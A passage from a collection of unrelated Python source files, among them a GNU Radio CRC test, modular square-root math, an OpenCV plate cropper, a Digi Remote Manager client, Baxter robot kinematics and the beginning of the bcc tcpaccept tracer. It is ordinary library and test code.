0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0,
0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1)
testtag = gr.tag_t()
testtag.offset = len(data) - 1
testtag.key = pmt.string_to_symbol('tag1')
testtag.value = pmt.from_long(0)
src = blocks.vector_source_b(data, False, 1, (testtag, ))
crc_check = digital.crc32_bb(True, self.tsb_key, False)
sink = blocks.tsb_vector_sink_b(tsb_key=self.tsb_key)
self.tb.connect(src,
blocks.stream_to_tagged_stream(
gr.sizeof_char, 1, len(data), self.tsb_key),
crc_check, sink)
self.tb.run()
self.assertEqual([len(data) - 33, ], [
tag.offset for tag in sink.tags()
if pmt.symbol_to_string(tag.key) == 'tag1'
])
if __name__ == '__main__':
gr_unittest.run(qa_crc32_bb, "qa_crc32_bb.xml")
|
py
|
1a5f198e8d8eee107d0062007fe26a354929ba86
|
import random
from itertools import product
from .common import extract_prime_power
from .modular import solve_crt, invmod
def has_sqrtmod(a, factors=None):
"""
Check if @a is quadratic residue, factorization needed
@factors - list of (prime, power) tuples
"""
if not factors:
raise ValueError("Factors can't be empty: %s" % factors)
for p, k in factors.items():
if p <= 1 or k <= 0:
raise ValueError("Not valid prime power: %s**%s" % (p, k))
if not has_sqrtmod_prime_power(a, p, k):
return False
return True
def sqrtmod(a, factors):
"""
x ^ 2 = a (mod *factors).
Yield square roots by product of @factors as modulus.
@factors - list of (prime, power) tuples
"""
coprime_factors = [p ** k for p, k in factors.items()]
sqrts = []
for i, (p, k) in enumerate(factors.items()):
# it's bad that all roots by each modulus are calculated here
# - we can start yielding roots faster
sqrts.append(
list(sqrtmod_prime_power(a % coprime_factors[i], p, k))
)
for rems in product(*sqrts):
yield solve_crt(rems, coprime_factors)
return
def has_sqrtmod_prime_power(a, p, n=1):
"""
Check if @a (mod @p**@n) is quadratic residue, @p is prime.
"""
if p < 2:
raise ValueError("Prime must be greater than 1: " + str(p))
if n < 1:
raise ValueError("Prime power must be positive: " + str(n))
a = a % (p ** n)
if a in (0, 1):
return True
e, a = extract_prime_power(a, p)
if e:
if e & 1:
return False
else:
return has_sqrtmod_prime_power(a, p, n)
if p == 2: # power of 2
return a % 8 == 1
return jacobi(a, p) == 1
def sqrtmod_prime_power(a, p, k=1):
"""
Yield square roots of @a mod @p**@k,
@p - prime
@k >= 1
"""
if k < 1:
raise ValueError("prime power k < 1: %d" % k)
powers = [1]
pow_p = 1
for i in range(k):
pow_p *= p
powers.append(pow_p)
# x**2 == a (mod p), p is prime
def sqrtmod_prime(a, p):
if a == 0:
return (0,)
if a == 1:
return (1, p-1) if p != 2 else (1,)
if jacobi(a, p) == -1:
raise ValueError("No square root for %d (mod %d)" % (a, p))
while True:
b = random.randint(1, p - 1)
if jacobi(b, p) == -1:
break
pow2, t = extract_prime_power(p - 1, 2)
ai = invmod(a, p)
c = pow(b, t, p)
r = pow(a, (t + 1) // 2, p)
for i in range(1, pow2):
e = pow(2, pow2 - i - 1, p - 1)
d = pow(pow(r, 2, p) * ai, e, p)
if d == p - 1:
r = (r * c) % p
c = pow(c, 2, p)
return (r, (-r) % p) # both roots
# x**2 == a (mod p**k), p is prime, gcd(a, p) == 1
def sqrtmod_prime_power_for_coprime(a, p, k):
if a == 1:
if p == 2:
if k == 1:
return (1, )
if k == 2:
return (1, 3)
if k == 3:
return (1, 3, 5, 7)
else:
return 1, pow_p - 1
if p == 2: # roots mod 2**k
roots = 1, 3
powind = 3
while powind < k:
next_powind = powind + 1
next_roots = set()
arem = a % powers[next_powind]
for r in roots: # can be done better
if pow(r, 2, powers[next_powind]) == arem:
next_roots.add(r)
r = powers[powind] - r
if pow(r, 2, powers[next_powind]) == arem:
next_roots.add(r)
powind = next_powind
roots = next_roots
roots = [pow_p - r for r in roots] + list(roots)
return roots
else: # p >= 3
r = sqrtmod_prime(a, p)[0] # any root
powind = 1
while powind < k:
next_powind = min(powind * 2, k)
# Represent root: x = +- (r + p**powind * t1)
b = (a - r**2) % powers[next_powind]
b = (b * invmod(2*r, powers[next_powind])) % powers[next_powind]
if b:
if b % powers[powind]:
raise ValueError("No square root for given value")
b //= powers[powind]
b %= powers[powind]
# Represent t1 = t2 * p**powind + b
# Re-represent root:
# x = +- [ (r + p**powind * b) + t2 * p**(powind*2) ]
r += powers[powind] * b
powind = next_powind
# For next round: x = +- (r + t2 * p**next_powind)
return r % pow_p, (-r) % pow_p
return
# x**2 == 0 (mod p**k), p is prime
def sqrt_for_zero(p, k):
roots = [0]
start_k = (k // 2 + 1) if k & 1 else (k // 2)
r = powers[start_k] % pow_p
r0 = r
while True:
if r: # don't duplicate zero
roots.append(r)
r = (r + powers[start_k]) % pow_p
if r == r0:
break
return roots
# main code
if a == 0:
for r in sqrt_for_zero(p, k):
yield r
return
e, a = extract_prime_power(a, p)
if e & 1:
raise ValueError("No square root for %d (mod %d**%d)" % (a, p, k))
p_acc = powers[e >> 1]
sqrt_k = k - e
roots = sqrtmod_prime_power_for_coprime(a, p, sqrt_k)
if sqrt_k == 0:
for r in roots:
yield (r * p_acc) % pow_p
return
all_roots = set()
for r in roots:
r0 = r % pow_p
while True:
root = (r * p_acc) % pow_p
if root not in all_roots:
yield root
all_roots.add(root)
r = (r + powers[sqrt_k]) % pow_p
if r == r0:
break
return
def jacobi(a, n):
"""
Return Jacobi symbol (or Legendre symbol if n is prime)
"""
s = 1
while True:
if n < 1:
raise ValueError("Too small module for Jacobi symbol: " + str(n))
if n & 1 == 0:
raise ValueError("Jacobi is defined only for odd modules")
if n == 1:
return s
a = a % n
if a == 0:
return 0
if a == 1:
return s
if a & 1 == 0:
if n % 8 in (3, 5):
s = -s
a >>= 1
continue
if a % 4 == 3 and n % 4 == 3:
s = -s
a, n = n, a
return
|
py
|
1a5f19a3e24b320ed39cedd9d0035ec8e4954ad6
|
from stringstring.ascii_letters import ascii_letters
def stringstring(string):
base = ''
for i in range(6):
for j in string:
base += ascii_letters[i][j]
base += '\n'
string = string.replace(' ', '')
result = ''
counter = 0
for i in base:
if i == '~':
result += string[counter]
counter += 1
if counter == len(string):
counter = 0
else:
result += i
return result
if __name__ == "__main__":
print(stringstring('Hello World!'))
print(stringstring("This is StringString"))
|
py
|
1a5f1a88f3c0ec9eff4d851fb8731ca2f12a71f4
|
from __future__ import annotations
from pathlib import Path
import cv2 as cv
import numpy as np
from typing import Tuple
SCANNER_PLATE_RADIUS = 1044 // 2
RED_COLOR = (0, 0, 255)
def to_grayscale(image):
return cv.cvtColor(image, cv.COLOR_BGR2GRAY)
def edge_detection(image):
return cv.Canny(image, threshold1=60, threshold2=120)
def blur(size=5):
def apply(image):
return cv.GaussianBlur(image, ksize=(size, size), sigmaX=0)
return apply
def find_circles(image):
return cv.HoughCircles(
image, cv.HOUGH_GRADIENT, dp=1.3, minDist=SCANNER_PLATE_RADIUS * 2 - 50, minRadius=480, maxRadius=540
)
def get_circle_centers(circles):
return circles[0, :, :2].astype(int)
def detect_plate_circles(image):
cropping_pipeline = pipeline(
to_grayscale,
blur(3),
edge_detection,
find_circles,
get_circle_centers,
)
return sorted_plate_centers(cropping_pipeline(image))
def clear_outside_plate(image: np.ndarray) -> np.ndarray:
radius = SCANNER_PLATE_RADIUS
mask = np.zeros_like(image)
cv.circle(mask, (radius, radius), radius, color=(255, 255, 255), thickness=-1)
result = image.copy()
result[mask != 255] = 0
return result
def cut_plate(image: np.ndarray, center: Tuple[int, int]) -> np.ndarray:
x, y = center
radius = SCANNER_PLATE_RADIUS
plate = image[y - radius:y + radius, x - radius:x + radius]
return clear_outside_plate(plate)
def sorted_plate_centers(centers: np.ndarray) -> np.ndarray:
positions = coordinates_to_positions(centers)
result_indices = np.lexsort((positions[:, 0], positions[:, 1]))
return centers[result_indices]
def coordinates_to_positions(centers):
return (centers - centers.min(axis=0) + SCANNER_PLATE_RADIUS) // (SCANNER_PLATE_RADIUS * 2)
def pipeline(*functions):
def call(image):
for function in functions:
image = function(image)
return image
return call
def crop_plates(image, circle_centers):
return [cut_plate(image, center) for center in circle_centers]
def get_combined_shape(circle_centers):
positions = coordinates_to_positions(circle_centers)
columns, rows = positions.max(0) + 1
return rows, columns
def show_detected_plates(image):
centers = detect_plate_circles(image)
draw_plate_circles(image, centers)
return image
def draw_plate_circles(image, centers, *, with_numbers=False):
for i, center in enumerate(centers):
cv.circle(image, tuple(center), radius=SCANNER_PLATE_RADIUS, color=RED_COLOR, thickness=7)
if with_numbers:
cv.putText(image, str(i + 1), tuple(center + (-50, 50)),
fontFace=cv.FONT_HERSHEY_SIMPLEX, fontScale=10, color=RED_COLOR, thickness=14)
def combine_plates(plates, shape):
rows, columns = shape
diameter = SCANNER_PLATE_RADIUS * 2
final_image = np.zeros((rows * diameter, columns * diameter, 3)).astype('uint8')
for i, plate in enumerate(plates):
top = (i // columns) * diameter
left = (i % columns) * diameter
final_image[top: top + diameter, left: left + diameter, :] = plate
return final_image
def save_combined_plates(output_folder, path, combined_image):
cv.imwrite(str(output_folder / f'{path.stem}-cropped{path.suffix}'), combined_image)
def save_separate_plates(output_folder, path, plates):
for i, plate in enumerate(plates):
print(path.stem, i)
cv.imwrite(str(output_folder / f'{path.stem}-{i + 1}{path.suffix}'), plate)
def process_path(path: Path, output_folder: Path, action) -> None:
output_folder.mkdir(parents=True, exist_ok=True)
scanner_image = cv.imread(str(path))
print(f'Processing {path.name}')
plate_centers = detect_plate_circles(scanner_image)
action(output_folder, path, scanner_image, plate_centers)
def _save_separate_plates(output_folder, path, image, centers):
plates = crop_plates(image, centers)
save_separate_plates(output_folder, path, plates)
def _save_combined_plates(output_folder, path, image, centers):
plates = crop_plates(image, centers)
shape = get_combined_shape(centers)
save_combined_plates(output_folder, path, combine_plates(plates, shape))
def _mark_plates(output_folder, path, image, centers):
draw_plate_circles(image, centers)
cv.imwrite(str(output_folder / f'{path.stem}-circles{path.suffix}'), image)
def main() -> None:
for plate in sorted(Path('cropper-hard-cases').glob('*.tif')):
process_path(plate, Path('results/circles'), _mark_plates)
if __name__ == '__main__':
main()
# todo test for number of found plates and for their centers
|
py
|
1a5f1b21ef5709416a9bc5c3735e9f964dc0e460
|
"""
Copyright (c) 2018, Digi International, Inc.
Module released under MIT License.
Module for easy interface with Digi Remote Manager.
Using documentation from "https://www.digi.com/resources/documentation/digidocs/90001437-13/default.htm#reference/r_ws_v1_streams.htm%3FTocPath%3DWeb%2520services%2520reference%7Cv1%252Fstreams%7C_____0"
- Documentation does require an account to access
Use with samples/cellular/remotemanager/rm_sample.py.
"""
import ubinascii
import urequests
class AuthorizationException(Exception):
pass
STREAMS_URI = "https://remotemanager.digi.com/ws/v1/streams/"
class RemoteManagerConnection:
def __init__(self, credentials, auth_scheme="Basic"):
if not credentials:
self.auth = None
else:
self.set_auth(credentials, auth_scheme)
def set_auth(self, credentials, auth_scheme="Basic"):
if auth_scheme == "Basic":
self.auth = "Basic " + ubinascii.b2a_base64(credentials['username'] + ":" + credentials['password']).decode().strip()
elif auth_scheme == "Bearer":
self.auth = "Bearer " + credentials['token']
else:
raise AuthorizationException("Unsupported authorization scheme: " + auth_scheme)
@staticmethod
def check_response_code(response):
if response.status_code not in (200, 201, 204):
raise ConnectionError("Bad HTTP response status code: " + str(response.status_code))
else:
return response
def set_headers(self, headers):
if not self.auth:
raise AuthorizationException("No authorization credentials provided")
headers = dict() if headers is None else headers
headers['Authorization'] = self.auth
return headers
def get_datastreams(self, headers=None):
headers = self.set_headers(headers)
response = urequests.get(STREAMS_URI + "inventory.json", headers=headers)
self.check_response_code(response)
return [stream['id'] for stream in response.json()['list']]
def get_datastream_info(self, stream_id, headers=None):
headers = self.set_headers(headers)
response = urequests.get(STREAMS_URI + "inventory/" + stream_id + ".json", headers=headers)
return self.check_response_code(response)
def update_datastream(self, stream_id, json, headers=None):
headers = self.set_headers(headers)
response = urequests.put(STREAMS_URI + "inventory/" + stream_id, headers=headers, json=json)
return self.check_response_code(response)
def create_datastream(self, json, headers=None):
headers = self.set_headers(headers)
response = urequests.post(STREAMS_URI + "inventory/", headers=headers, json=json)
return self.check_response_code(response)
def delete_datastream(self, stream_id, headers=None):
headers = self.set_headers(headers)
response = urequests.delete(STREAMS_URI + "inventory/" + stream_id, headers=headers)
return self.check_response_code(response)
def add_datapoint(self, stream_id, value, headers=None):
headers = self.set_headers(headers)
response = urequests.post(STREAMS_URI + "history/", headers=headers, json={"stream_id": stream_id, "value": value})
return self.check_response_code(response)
def delete_datapoint(self, stream_id, start_time=None, end_time=None, headers=None):
headers = self.set_headers(headers)
response = urequests.delete(STREAMS_URI + "history/" + stream_id, params={"start_time": start_time, "end_time": end_time}, headers=headers)
return self.check_response_code(response)
|
py
|
1a5f1b405a46acd18d13d5bdedd7aac330031664
|
#!/usr/bin/env python3
# Copyright (c) 2017-2018 The Readercoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Tests NODE_NETWORK_LIMITED.
Tests that a node configured with -prune=550 signals NODE_NETWORK_LIMITED correctly
and that it responds to getdata requests for blocks correctly:
- send a block within 288 + 2 of the tip
- disconnect peers who request blocks older than that."""
from test_framework.messages import CInv, msg_getdata, msg_verack, NODE_BLOOM, NODE_NETWORK_LIMITED, NODE_WITNESS
from test_framework.mininode import P2PInterface, mininode_lock
from test_framework.test_framework import ReadercoinTestFramework
from test_framework.util import assert_equal, disconnect_nodes, connect_nodes_bi, sync_blocks, wait_until
class P2PIgnoreInv(P2PInterface):
firstAddrnServices = 0
def on_inv(self, message):
# The node will send us invs for other blocks. Ignore them.
pass
def on_addr(self, message):
self.firstAddrnServices = message.addrs[0].nServices
def wait_for_addr(self, timeout=5):
test_function = lambda: self.last_message.get("addr")
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def send_getdata_for_block(self, blockhash):
getdata_request = msg_getdata()
getdata_request.inv.append(CInv(2, int(blockhash, 16)))
self.send_message(getdata_request)
class NodeNetworkLimitedTest(ReadercoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
self.extra_args = [['-prune=550', '-addrmantest'], [], []]
def disconnect_all(self):
disconnect_nodes(self.nodes[0], 1)
disconnect_nodes(self.nodes[1], 0)
disconnect_nodes(self.nodes[2], 1)
disconnect_nodes(self.nodes[2], 0)
disconnect_nodes(self.nodes[0], 2)
disconnect_nodes(self.nodes[1], 2)
def setup_network(self):
self.add_nodes(self.num_nodes, self.extra_args)
self.start_nodes()
def run_test(self):
node = self.nodes[0].add_p2p_connection(P2PIgnoreInv())
expected_services = NODE_BLOOM | NODE_WITNESS | NODE_NETWORK_LIMITED
self.log.info("Check that node has signalled expected services.")
assert_equal(node.nServices, expected_services)
self.log.info("Check that the localservices is as expected.")
assert_equal(int(self.nodes[0].getnetworkinfo()['localservices'], 16), expected_services)
self.log.info("Mine enough blocks to reach the NODE_NETWORK_LIMITED range.")
connect_nodes_bi(self.nodes, 0, 1)
blocks = self.nodes[1].generatetoaddress(292, self.nodes[1].get_deterministic_priv_key().address)
sync_blocks([self.nodes[0], self.nodes[1]])
self.log.info("Make sure we can max retrieve block at tip-288.")
node.send_getdata_for_block(blocks[1]) # last block in valid range
node.wait_for_block(int(blocks[1], 16), timeout=3)
self.log.info("Requesting block at height 2 (tip-289) must fail (ignored).")
node.send_getdata_for_block(blocks[0]) # first block outside of the 288+2 limit
node.wait_for_disconnect(5)
self.log.info("Check local address relay, do a fresh connection.")
self.nodes[0].disconnect_p2ps()
node1 = self.nodes[0].add_p2p_connection(P2PIgnoreInv())
node1.send_message(msg_verack())
node1.wait_for_addr()
#must relay address with NODE_NETWORK_LIMITED
assert_equal(node1.firstAddrnServices, 1036)
self.nodes[0].disconnect_p2ps()
node1.wait_for_disconnect()
# connect unsynced node 2 with pruned NODE_NETWORK_LIMITED peer
# because node 2 is in IBD and node 0 is a NODE_NETWORK_LIMITED peer, sync must not be possible
connect_nodes_bi(self.nodes, 0, 2)
try:
sync_blocks([self.nodes[0], self.nodes[2]], timeout=5)
except:
pass
# node2 must remain at height 0
assert_equal(self.nodes[2].getblockheader(self.nodes[2].getbestblockhash())['height'], 0)
# now connect also to node 1 (non pruned)
connect_nodes_bi(self.nodes, 1, 2)
# sync must be possible
sync_blocks(self.nodes)
# disconnect all peers
self.disconnect_all()
# mine 10 blocks on node 0 (pruned node)
self.nodes[0].generatetoaddress(10, self.nodes[0].get_deterministic_priv_key().address)
# connect node1 (non pruned) with node0 (pruned) and check if the can sync
connect_nodes_bi(self.nodes, 0, 1)
# sync must be possible, node 1 is no longer in IBD and should therefore connect to node 0 (NODE_NETWORK_LIMITED)
sync_blocks([self.nodes[0], self.nodes[1]])
if __name__ == '__main__':
NodeNetworkLimitedTest().main()
|
py
|
1a5f1b8a605be80bdcce79f35fa3d42c689aeb28
|
#!/usr/bin/env python
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def get_version():
with open('VERSION', 'r') as f:
version_str = f.read().strip()
assert version_str
return version_str
setup(
name='telega-compose',
version=get_version(),
description='Utility to render docker-compose files with different states',
long_description=open('README.rst', 'r').read(),
author='Django Stars',
author_email='[email protected]',
url='https://github.com/django-stars/telega-compose',
packages=['telega_compose'],
entry_points="""
[console_scripts]
tcompose=telega_compose.main:cli
""",
install_requires=open('requirements.txt', 'r').readlines(),
license='MIT',
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Utilities',
]
)
|
py
|
1a5f1be5d55fe6ceccf2100cd007d79fd6a945dc
|
import unittest
from dbas.handler import password
class PasswordHandlerTests(unittest.TestCase):
def test_get_rnd_passwd(self):
self.assertEqual(len(password.get_rnd_passwd()), 10)
self.assertEqual(len(password.get_rnd_passwd(8)), 8)
# Test, whether 2 passwords are equal.
self.assertNotEqual(password.get_rnd_passwd(), password.get_rnd_passwd())
|
py
|
1a5f1becd6ba5853c3365f416503247062726bc5
|
#!/usr/bin/python
# Copyright (c) 2013-2014, Rethink Robotics
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the Rethink Robotics nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import numpy as np
import PyKDL
# import rospy
import baxter_interface
from baxter_kdl.kdl_parser import kdl_tree_from_urdf_model
from urdf_parser_py.urdf import URDF
class baxter_kinematics(object):
"""
Baxter Kinematics with PyKDL
"""
def __init__(self, limb):
self._baxter = URDF.from_parameter_server(key='robot_description')
self._kdl_tree = kdl_tree_from_urdf_model(self._baxter)
self._base_link = self._baxter.get_root()
self._tip_link = limb + '_gripper'
self._tip_frame = PyKDL.Frame()
self._arm_chain = self._kdl_tree.getChain(self._base_link,
self._tip_link)
# Baxter Interface Limb Instances
self._limb_interface = baxter_interface.Limb(limb)
self._joint_names = self._limb_interface.joint_names()
self._num_jnts = len(self._joint_names)
# Store joint information for future use
self.get_joint_information()
# KDL Solvers
self._fk_p_kdl = PyKDL.ChainFkSolverPos_recursive(self._arm_chain)
self._fk_v_kdl = PyKDL.ChainFkSolverVel_recursive(self._arm_chain)
self._ik_v_kdl = PyKDL.ChainIkSolverVel_pinv(self._arm_chain)
self._ik_p_kdl = PyKDL.ChainIkSolverPos_NR(self._arm_chain,
self._fk_p_kdl,
self._ik_v_kdl)
self._jac_kdl = PyKDL.ChainJntToJacSolver(self._arm_chain)
self._dyn_kdl = PyKDL.ChainDynParam(self._arm_chain,
PyKDL.Vector.Zero())
def print_robot_description(self):
nf_joints = 0
for j in self._baxter.joints:
if j.type != 'fixed':
nf_joints += 1
print("URDF non-fixed joints: %d;" % nf_joints)
print("URDF total joints: %d" % len(self._baxter.joints))
print("URDF links: %d" % len(self._baxter.links))
print("KDL joints: %d" % self._kdl_tree.getNrOfJoints())
print("KDL segments: %d" % self._kdl_tree.getNrOfSegments())
def print_kdl_chain(self):
for idx in xrange(self._arm_chain.getNrOfSegments()):
print('* ' + self._arm_chain.getSegment(idx).getName())
def get_joint_information(self):
joints = {}
for j in self._baxter.joints:
if j.type != 'fixed':
joints[j.name] = j
self.joint_limits_lower = []
self.joint_limits_upper = []
self.joint_types = []
for jnt_name in self._joint_names:
jnt = joints[jnt_name]
if jnt.limit is not None:
self.joint_limits_lower.append(jnt.limit.lower)
self.joint_limits_upper.append(jnt.limit.upper)
else:
self.joint_limits_lower.append(None)
self.joint_limits_upper.append(None)
self.joint_types.append(jnt.type)
def replace_none(x, v):
if x is None:
return v
return x
self.joint_limits_lower = np.array([replace_none(jl, -np.inf)
for jl in self.joint_limits_lower])
self.joint_limits_upper = np.array([replace_none(jl, np.inf)
for jl in self.joint_limits_upper])
self.joint_types = np.array(self.joint_types)
def joints_to_kdl(self, type, values=None):
kdl_array = PyKDL.JntArray(self._num_jnts)
if values is None:
if type == 'positions':
cur_type_values = self._limb_interface.joint_angles()
elif type == 'velocities':
cur_type_values = self._limb_interface.joint_velocities()
elif type == 'torques':
cur_type_values = self._limb_interface.joint_efforts()
else:
cur_type_values = values
for idx, name in enumerate(self._joint_names):
kdl_array[idx] = cur_type_values[name]
if type == 'velocities':
kdl_array = PyKDL.JntArrayVel(kdl_array)
return kdl_array
def kdl_to_mat(self, data):
mat = np.mat(np.zeros((data.rows(), data.columns())))
for i in range(data.rows()):
for j in range(data.columns()):
mat[i,j] = data[i,j]
return mat
def forward_position_kinematics(self,joint_values=None):
end_frame = PyKDL.Frame()
self._fk_p_kdl.JntToCart(self.joints_to_kdl('positions',joint_values),
end_frame)
pos = end_frame.p
rot = PyKDL.Rotation(end_frame.M)
rot = rot.GetQuaternion()
return np.array([pos[0], pos[1], pos[2],
rot[0], rot[1], rot[2], rot[3]])
def forward_velocity_kinematics(self,joint_velocities=None):
end_frame = PyKDL.FrameVel()
self._fk_v_kdl.JntToCart(self.joints_to_kdl('velocities',joint_velocities),
end_frame)
return end_frame.GetTwist()
def inverse_kinematics(self, position, orientation=None, seed=None, min_joints=None, max_joints=None, maxiter=500, eps=1.0e-6):
ik = PyKDL.ChainIkSolverVel_pinv(self._arm_chain)
pos = PyKDL.Vector(position[0], position[1], position[2])
if orientation is not None:
rot = PyKDL.Rotation()
rot = rot.Quaternion(orientation[0], orientation[1],
orientation[2], orientation[3])
# Populate seed with current angles if not provided
seed_array = PyKDL.JntArray(self._num_jnts)
if seed is not None:
seed_array.resize(len(seed))
for idx, jnt in enumerate(seed):
seed_array[idx] = jnt
else:
seed_array = self.joints_to_kdl('positions')
# Make IK Call
if orientation is not None:
goal_pose = PyKDL.Frame(rot, pos)
else:
goal_pose = PyKDL.Frame(pos)
result_angles = PyKDL.JntArray(self._num_jnts)
# Make IK solver with joint limits
if min_joints is None:
min_joints = self.joint_limits_lower
if max_joints is None:
max_joints = self.joint_limits_upper
mins_kdl = PyKDL.JntArray(len(min_joints))
for idx,jnt in enumerate(min_joints): mins_kdl[idx] = jnt
maxs_kdl = PyKDL.JntArray(len(max_joints))
for idx,jnt in enumerate(max_joints): maxs_kdl[idx] = jnt
ik_p_kdl = PyKDL.ChainIkSolverPos_NR_JL(self._arm_chain, mins_kdl, maxs_kdl,
self._fk_p_kdl, self._ik_v_kdl, maxiter, eps)
if ik_p_kdl.CartToJnt(seed_array, goal_pose, result_angles) >= 0:
result = np.array(list(result_angles))
return result
else:
return None
def jacobian(self,joint_values=None):
jacobian = PyKDL.Jacobian(self._num_jnts)
self._jac_kdl.JntToJac(self.joints_to_kdl('positions',joint_values), jacobian)
return self.kdl_to_mat(jacobian)
def jacobian_transpose(self,joint_values=None):
return self.jacobian(joint_values).T
def jacobian_pseudo_inverse(self,joint_values=None):
return np.linalg.pinv(self.jacobian(joint_values))
def inertia(self,joint_values=None):
inertia = PyKDL.JntSpaceInertiaMatrix(self._num_jnts)
self._dyn_kdl.JntToMass(self.joints_to_kdl('positions',joint_values), inertia)
return self.kdl_to_mat(inertia)
def cart_inertia(self,joint_values=None):
js_inertia = self.inertia(joint_values)
jacobian = self.jacobian(joint_values)
return np.linalg.inv(jacobian * np.linalg.inv(js_inertia) * jacobian.T)
|
py
|
1a5f1c41e6f4c3e705c360cda0d2e6f7d80357ba
|
# Copyright (c) 2015 Uber Technologies, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from __future__ import (
absolute_import, division, print_function, unicode_literals
)
from . import schemes
from . import transport as t
from .status import OK
__all__ = ['Response']
class Response(object):
"""A TChannel response.
This is sent by handlers and received by callers.
:ivar body:
The payload of this response. The type of this attribute depends on the
scheme being used (e.g., JSON, Thrift, etc.).
:ivar headers:
A dictionary of application headers. This should be a mapping of
strings to strings.
:ivar transport:
Protocol-level transport headers. These are used for routing over
Hyperbahn.
"""
# TODO implement __repr__
__slots__ = (
'body',
'status',
'headers',
'transport',
)
def __init__(self, body=None, headers=None, transport=None, status=None):
if status is None:
status = OK
self.body = body
self.status = status
self.headers = headers
self.transport = transport
class TransportHeaders(object):
"""Response-specific Transport Headers"""
# TODO implement __repr__
__slots__ = (
'failure_domain',
'scheme',
)
def __init__(self, failure_domain=None, scheme=None):
if scheme is None:
scheme = schemes.RAW
self.failure_domain = failure_domain
self.scheme = scheme
@classmethod
def from_dict(cls, data):
return cls(
failure_domain=data.get(t.FAILURE_DOMAIN),
scheme=data.get(t.SCHEME),
)
def to_dict(self):
m = {}
if self.failure_domain is not None:
m[t.FAILURE_DOMAIN] = self.failure_domain
if self.scheme is not None:
m[t.SCHEME] = self.scheme
return m
def response_from_mixed(mixed):
"""Create Response from mixed input."""
# if none then give empty Response
if mixed is None:
return Response()
# if not Response, then treat like body
if not isinstance(mixed, Response):
return Response(mixed)
# it's already a Response
return mixed
|
py
|
1a5f1c7b527113e417fc8cf307ca9a4a55c04fb4
|
#!/usr/bin/python
# @lint-avoid-python-3-compatibility-imports
#
# tcpaccept Trace TCP accept()s.
# For Linux, uses BCC, eBPF. Embedded C.
#
# USAGE: tcpaccept [-h] [-T] [-t] [-p PID] [-P PORTS]
#
# This uses dynamic tracing of the kernel inet_csk_accept() socket function
# (from tcp_prot.accept), and will need to be modified to match kernel changes.
#
# Copyright (c) 2015 Brendan Gregg.
# Licensed under the Apache License, Version 2.0 (the "License")
#
# 13-Oct-2015 Brendan Gregg Created this.
# 14-Feb-2016 " " Switch to bpf_perf_output.
from __future__ import print_function
from bcc.containers import filter_by_containers
from bcc import BPF
from socket import inet_ntop, AF_INET, AF_INET6
from struct import pack
import argparse
from bcc.utils import printb
from time import strftime
# arguments
examples = """examples:
./tcpaccept # trace all TCP accept()s
./tcpaccept -t # include timestamps
./tcpaccept -P 80,81 # only trace port 80 and 81
./tcpaccept -p 181 # only trace PID 181
./tcpaccept --cgroupmap mappath # only trace cgroups in this BPF map
./tcpaccept --mntnsmap mappath # only trace mount namespaces in the map
"""
parser = argparse.ArgumentParser(
description="Trace TCP accepts",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=examples)
parser.add_argument("-T", "--time", action="store_true",
help="include time column on output (HH:MM:SS)")
parser.add_argument("-t", "--timestamp", action="store_true",
help="include timestamp on output")
parser.add_argument("-p", "--pid",
